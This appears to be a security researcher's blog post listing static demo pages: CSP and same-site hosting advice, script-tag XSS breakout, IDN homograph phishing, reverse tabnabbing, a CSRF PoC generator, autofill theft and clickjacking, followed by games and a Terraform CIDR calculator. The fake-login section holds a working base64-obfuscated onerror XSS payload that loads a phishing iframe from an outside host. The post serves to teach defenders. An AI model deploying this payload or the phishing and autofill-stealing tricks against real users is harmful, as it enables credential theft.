Useful static apps! (Updated)

Sometimes I make static pages for a single purpose and they can be quite useful, so I will just leave them here.

For security

Here is a simple page to showcase some useful Content Security Policy (CSP) tricks for protecting apps from XSS. I find that sharing this page, with a bit of explanation, gets buy-in from developers a lot quicker than a written finding does: the core trick is a per-response nonce on your own script tags plus 'strict-dynamic', so an injected script without the nonce simply does not run.

Here is my example of why it is a good idea to host user-provided content, especially content the user has full control over (uploads, SSRF results, proxied pages), on a completely separate domain. Google is no exception (googleusercontent.com). This way the same-origin policy protects your web app from XSS-style attacks: a script inside the hosted content runs in a different origin and cannot touch the app's DOM, storage or cookies. The separate domain has to be a different registrable domain, not a subdomain, because cookies set with a Domain attribute are shared across subdomains.
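As an added example (not the demo page's code), the two checks behind that advice: same-origin is scheme + host + port, but the cookie boundary is the registrable domain (eTLD+1), so usercontent.example.com is a different origin from app.example.com yet still shares its cookie scope. It assumes Node.js, and the public-suffix list is a tiny hard-coded stand-in for the real one.

```javascript
// Added example, not code from the original page. Assumes Node.js.
// Toy stand-in for the public suffix list (real code should use the full list).
const PUBLIC_SUFFIXES = new Set(['com', 'net', 'org', 'co.uk']);

// Origin as the browser sees it: scheme + host (+ non-default port).
function origin(urlStr) {
  const u = new URL(urlStr);
  return `${u.protocol}//${u.host}`;
}

function isSameOrigin(a, b) {
  return origin(a) === origin(b);
}

// Registrable domain (eTLD+1) of a hostname using the toy suffix list.
function registrableDomain(hostname) {
  const labels = hostname.toLowerCase().split('.');
  for (let i = 1; i < labels.length; i++) {
    const suffix = labels.slice(i).join('.');
    if (PUBLIC_SUFFIXES.has(suffix)) return labels.slice(i - 1).join('.');
  }
  return hostname.toLowerCase();
}

// Cookies with Domain=example.com are sent to every *.example.com, so two hosts
// under the same registrable domain share a cookie scope even across origins.
function sharesCookieScope(a, b) {
  return registrableDomain(new URL(a).hostname) === registrableDomain(new URL(b).hostname);
}

// Only host user-controlled HTML / proxied pages where BOTH the origin differs
// and no cookie scope is shared with the application.
function safeUserContentHost(appUrl, contentUrl) {
  return !isSameOrigin(appUrl, contentUrl) && !sharesCookieScope(appUrl, contentUrl);
}
```

The same reasoning applies to other ambient authority that is scoped wider than the origin, for example wildcard CORS rules or a document.domain relaxation, so "different origin" alone is not the bar; "different site" is.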

Here is a fun XSS trick I had... This is useful when you notice your variable being injected or server-side rendered straight into an inline script block. The trick messes with how the browser first parses the HTML document to find tag boundaries, with no context about the JavaScript inside: the script element ends at the first "</script" the tokenizer sees, even when that text sits inside a JavaScript string literal, so everything after it is parsed as HTML again.
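As an added example (my own code for this post, not the page's), the breakout side by side with the fix. JSON.stringify produces valid JavaScript but leaves "<" alone, so a value containing "</script>" still closes the element; escaping "<" and ">" as \u003c and \u003e keeps the literal valid JS while hiding it from the HTML tokenizer. The splitAtScriptEnd helper mimics what the tokenizer does so you can see where the script really ends. It assumes Node.js; the templates and payload are constructed for the demo.

```javascript
// Added example, not code from the original page. Assumes Node.js.

// Vulnerable: valid JS, but "<" and ">" reach the HTML parser untouched.
function renderUnsafe(name) {
  return `<script>var user = ${JSON.stringify(name)};</script>`;
}

// Fix: JSON.stringify for JS validity, then JS escapes for the characters that
// matter to the HTML tokenizer (and the two line terminators JSON allows raw).
function jsStringForInlineScript(value) {
  return JSON.stringify(value)
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}
function renderSafe(name) {
  return `<script>var user = ${jsStringForInlineScript(name)};</script>`;
}

// Mimic the tokenizer: the script element ends at the first "</script",
// regardless of JS context. Returns the JS the browser would execute and the
// HTML that follows it.
function splitAtScriptEnd(html) {
  const lower = html.toLowerCase();
  const start = lower.indexOf('<script>') + '<script>'.length;
  const close = lower.indexOf('</script', start);
  return { js: html.slice(start, close), rest: html.slice(close) };
}
```

If the value is also used inside an HTML attribute or as text, it needs the HTML escaping for that context as well; the JS escaping above only covers the inline-script case.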

A fun fake login page: you can either iframe it directly or, as in this example, rewrite the HTML body and replace it with our fake login page (the base64 decodes to a one-liner that sets document.body.innerHTML to a full-height iframe of fakelogin.html):

<img src=x onerror=eval(atob('ZG9jdW1lbnQuYm9keS5pbm5lckhUTUw9IjxpZnJhbWUgc3JjPVwiaHR0cHM6Ly9lYmZlLnB3L3NoYXJlZC9mYWtlbG9naW4uaHRtbFwiIHN0eWxlPVwid2lkdGg6MTAwJTsgaGVpZ2h0OjEwMHZoXCIgLz4i'))>

QRCode generator using js library

My phishing page to showcase the IDN homograph attack. It used to collect internal IP ranges using WebRTC, but that seems to be broken now, and it uses a nice trick at the bottom to determine which social network you are logging into.
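As an added example (not the phishing page's code), what the homograph looks like once the URL parser has converted it, and two cheap checks you can run on a hostname: flag a label that mixes scripts (Latin plus Cyrillic, say), and fold known confusable letters back to Latin and compare against a brand list. The second check matters because a whole-script homograph such as "аррӏе.com" (every letter Cyrillic) sails past the mixed-script check. It assumes Node.js (the WHATWG URL class and Unicode property escapes are built in); the confusable table is a hand-picked subset, not the Unicode confusables data.

```javascript
// Added example, not code from the original page. Assumes Node.js.

// What the address bar and DNS actually see: Punycode (xn--...).
function asciiHostname(host) {
  return new URL(`https://${host}/`).hostname;
}

// Which scripts does a label use? (Only the three that matter for this demo.)
function scriptsInLabel(label) {
  const found = new Set();
  if (/\p{Script=Latin}/u.test(label)) found.add('Latin');
  if (/\p{Script=Cyrillic}/u.test(label)) found.add('Cyrillic');
  if (/\p{Script=Greek}/u.test(label)) found.add('Greek');
  return found;
}

// Hand-picked Cyrillic letters that render like Latin ones (subset, for the demo).
const CONFUSABLES = {
  'а': 'a', 'е': 'e', 'о': 'o', 'р': 'p', 'с': 'c',
  'х': 'x', 'у': 'y', 'ӏ': 'l', 'і': 'i',
};
function foldConfusables(s) {
  return [...s].map((c) => CONFUSABLES[c] || c).join('');
}

// Report: the ASCII form, whether any label mixes scripts, and which brand (if
// any) the folded name impersonates without actually being that brand.
function homographReport(host, brands) {
  const labels = host.split('.');
  const mixedScript = labels.some((l) => scriptsInLabel(l).size > 1);
  const folded = foldConfusables(host.toLowerCase());
  const ascii = asciiHostname(host);
  const impersonates = brands.find((b) => folded === b && ascii !== b) || null;
  return { ascii, mixedScript, impersonates };
}
```

Browsers show the Punycode form when their own spoof checks fire, which is why the all-Cyrillic variant works only where those checks are absent or weaker, for example in chat clients and e-mail previews that render the Unicode form.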

Open blank - changing the parent tab <- does what it says: a page opened via target="_blank" without rel="noopener" gets a window.opener reference and can navigate the original tab, for example to a look-alike login page (reverse tabnabbing). Modern browsers now imply noopener for target="_blank", so to reproduce it you need an older browser or an explicit rel="opener":

<a href="" target="_blank"></a>
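As an added example (my own code, not the demo page's), both sides of that trick: the code the opened tab runs to redirect its opener, and a server-side pass that adds rel="noopener noreferrer" to every target="_blank" link that lacks it. A plain object stands in for the window so it runs in Node.js; the HTML snippets are constructed for the demo.

```javascript
// Added example, not code from the original page. Assumes Node.js;
// a plain object plays the role of the browser's window.

// Runs in the newly opened tab. Returns true if it redirected the opener.
function nabOpener(win, phishingUrl) {
  if (!win.opener) return false;        // rel=noopener (or the modern default): nothing to do
  try {
    win.opener.location = phishingUrl;  // navigating the opener is allowed even cross-origin
    return true;
  } catch (e) {
    return false;
  }
}

// Server-side hardening: add rel="noopener noreferrer" to every
// <a target="_blank"> that lacks it. A regex is fine for this demo; use a real
// HTML parser on untrusted markup.
function hardenBlankLinks(html) {
  return html.replace(/<a\b([^>]*)>/gi, (tag, attrs) => {
    if (!/\btarget\s*=\s*["']?_blank["']?/i.test(attrs)) return tag;
    const rel = attrs.match(/\brel\s*=\s*["']([^"']*)["']/i);
    if (rel) {
      const vals = new Set(rel[1].split(/\s+/).filter(Boolean));
      vals.add('noopener');
      vals.add('noreferrer');
      return `<a${attrs.replace(rel[0], `rel="${[...vals].join(' ')}"`)}>`;
    }
    return `<a${attrs} rel="noopener noreferrer">`;
  });
}
```

The same opener reference exists for window.open() calls, so the JavaScript side needs the 'noopener' window feature (or nulling win.opener after the call) for the same reason.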

CSRF test page: generates an auto-submitting CSRF form page based on the "Copy as curl command" output from Burp. Although under Engagement tools Burp does have a "Generate CSRF PoC" option anyway. :p Oh well, whatever.
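As an added example (not the test page's own code), the conversion it does: parse the curl command for the URL, method and body, and emit a self-submitting form with one hidden input per body field. Headers and cookies from the curl line are deliberately dropped, because a cross-site form cannot set headers and the victim's browser supplies its own cookies; that is also why a JSON body is rejected here, since a plain form can only send form-urlencoded data. It assumes Node.js; the curl command in the test is constructed.

```javascript
// Added example, not code from the original page. Assumes Node.js.

// Minimal tokenizer for a curl command: handles single/double quotes and
// backslash-newline continuations as Burp and browsers emit them.
function parseCurl(cmd) {
  const flat = cmd.replace(/\\\n/g, ' ');
  const re = /'((?:[^'\\]|\\.)*)'|"((?:[^"\\]|\\.)*)"|(\S+)/g;
  const tokens = [];
  let m;
  while ((m = re.exec(flat))) {
    tokens.push(m[1] !== undefined ? m[1] : m[2] !== undefined ? m[2] : m[3]);
  }
  const req = { url: null, method: 'GET', headers: {}, body: null };
  for (let i = 1; i < tokens.length; i++) {
    const t = tokens[i];
    if (t === '-X' || t === '--request') {
      req.method = tokens[++i].toUpperCase();
    } else if (t === '-H' || t === '--header') {
      const [k, ...v] = tokens[++i].split(':');
      req.headers[k.trim().toLowerCase()] = v.join(':').trim();
    } else if (['-d', '--data', '--data-raw', '--data-binary'].includes(t)) {
      req.body = tokens[++i];
      if (req.method === 'GET') req.method = 'POST';   // curl's behaviour for -d
    } else if (t === '-b' || t === '--cookie') {
      i++;                                             // cookies: ignored, browser adds its own
    } else if (!t.startsWith('-') && req.url === null) {
      req.url = t;
    }
  }
  return req;
}

function escapeAttr(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Build the PoC page: hidden inputs for each form field, auto-submitted by script.
function csrfPoc(curlCmd) {
  const req = parseCurl(curlCmd);
  if (!req.url) throw new Error('no URL found in curl command');
  const ctype = (req.headers['content-type'] || 'application/x-www-form-urlencoded').split(';')[0].trim();
  if (req.body !== null && ctype !== 'application/x-www-form-urlencoded') {
    throw new Error(`unsupported body type ${ctype}: a plain form only sends form-urlencoded`);
  }
  const inputs = [];
  for (const [k, v] of new URLSearchParams(req.body || '')) {
    inputs.push(`  <input type="hidden" name="${escapeAttr(k)}" value="${escapeAttr(v)}">`);
  }
  return [
    '<html><body>',
    `<form action="${escapeAttr(req.url)}" method="${req.method === 'POST' ? 'POST' : 'GET'}">`,
    ...inputs,
    '  <input type="submit" value="Submit request">',
    '</form>',
    '<script>document.forms[0].submit();</script>',
    '</body></html>',
  ].join('\n');
}
```

If the generated page submits and the action succeeds, the endpoint has no working CSRF token and its session cookie is not protected by SameSite; if the request only works with a custom header such as X-Requested-With, the form PoC will fail and that header is what is protecting the endpoint.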

Pikachu is a static page that tries to steal your autofill info (the classic trick is to put extra fields off-screen so the browser fills them along with the ones you can see). Put ?debug=true at the end of the URL to see how it works, or ?cc=true to see if it can steal credit card autofill values. Unfortunately Chrome has made it more obvious by showing the drop-down selection for autofill values.

This page used to clickjack your browser and make your Facebook account like a page about Picklecat :). Unfortunately my Picklecat page was removed, and with the Chrome fix for SameSite (cookies without a SameSite attribute are now treated as Lax, so a framed third-party page no longer carries its session) this may not be a problem sooner or later. That said, you could modify the source to make a useful demo.

Games for kids and adults =))

A card generator app I made to create printable A4 pages of a card game for security training (for the best experience, use cardstock paper):

Same concept as above: I made a flashcard generator for my wife to use to teach the kids at her childcare:

Star Realms deck-building game: a simple point counter

Arm wrestling bible (made after I lost at arm wrestling to a much bigger dude)

A hangman game for kindy kids... with an image hint after 6 wrong picks. Although perhaps it is not suitable for children, since it is... "hang man"...

A text-to-speech scenario game for kids: the idea is to act it out and follow the narrative for each scenario.

Code highlight using JS that you can use to copy into a Word document:

A CIDR calculator page that includes the calculation for the Terraform cidrsubnet() function: extend the prefix length by newbits and pick the netnum-th subnet of that size.
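As an added example (my own code, not the calculator page's), an IPv4 implementation of cidrsubnet(prefix, newbits, netnum), plus cidrsubnets(prefix, newbits...), which carves consecutive subnets of different sizes out of one block, aligning each to its own size the way Terraform does. The expected values in the checks are the ones from the Terraform documentation. It assumes Node.js; IPv6 is out of scope.

```javascript
// Added example, not code from the original page. Assumes Node.js. IPv4 only.

function ipToInt(ip) {
  const parts = ip.split('.').map(Number);
  if (parts.length !== 4 || parts.some((p) => !Number.isInteger(p) || p < 0 || p > 255)) {
    throw new Error(`bad IPv4 address ${ip}`);
  }
  return ((parts[0] << 24) | (parts[1] << 16) | (parts[2] << 8) | parts[3]) >>> 0;
}

function intToIp(n) {
  return [(n >>> 24) & 255, (n >>> 16) & 255, (n >>> 8) & 255, n & 255].join('.');
}

// JS shifts are mod 32, so /0 needs a special case.
function maskForPrefix(len) {
  return len === 0 ? 0 : (0xffffffff << (32 - len)) >>> 0;
}

function parseCidr(cidr) {
  const [ip, lenStr] = cidr.split('/');
  const len = Number(lenStr);
  if (!Number.isInteger(len) || len < 0 || len > 32) throw new Error(`bad prefix length in ${cidr}`);
  return { network: (ipToInt(ip) & maskForPrefix(len)) >>> 0, len };
}

// Terraform cidrsubnet(): new prefix = len + newbits; netnum selects which of
// the 2^newbits subnets of that size to return.
function cidrsubnet(prefix, newbits, netnum) {
  const { network, len } = parseCidr(prefix);
  const newLen = len + newbits;
  if (newbits < 0 || newLen > 32) throw new Error(`newbits ${newbits} exceeds the 32-bit address space`);
  if (netnum < 0 || netnum >= 2 ** newbits) throw new Error(`netnum ${netnum} does not fit in ${newbits} bits`);
  const subnet = (network + netnum * 2 ** (32 - newLen)) >>> 0;
  return `${intToIp(subnet)}/${newLen}`;
}

// Terraform cidrsubnets(): consecutive subnets of the given sizes, each aligned
// to its own size (so a smaller subnet followed by a larger one leaves a gap).
function cidrsubnets(prefix, ...newbitsList) {
  const { network, len } = parseCidr(prefix);
  const total = 2 ** (32 - len);
  const out = [];
  let offset = 0;
  for (const nb of newbitsList) {
    const newLen = len + nb;
    if (nb < 1 || newLen > 32) throw new Error(`bad newbits ${nb}`);
    const size = 2 ** (32 - newLen);
    offset = Math.ceil(offset / size) * size;
    if (offset + size > total) throw new Error(`not enough address space in ${prefix}`);
    out.push(`${intToIp((network + offset) >>> 0)}/${newLen}`);
    offset += size;
  }
  return out;
}
```

The alignment step is the part people get wrong by hand: after a /24 the next /20 cannot start at the very next address, it has to start on the next /20 boundary, which is why Terraform's own example for cidrsubnets("10.1.0.0/16", 4, 4, 8, 4) ends at 10.1.48.0/20 rather than 10.1.33.0/20.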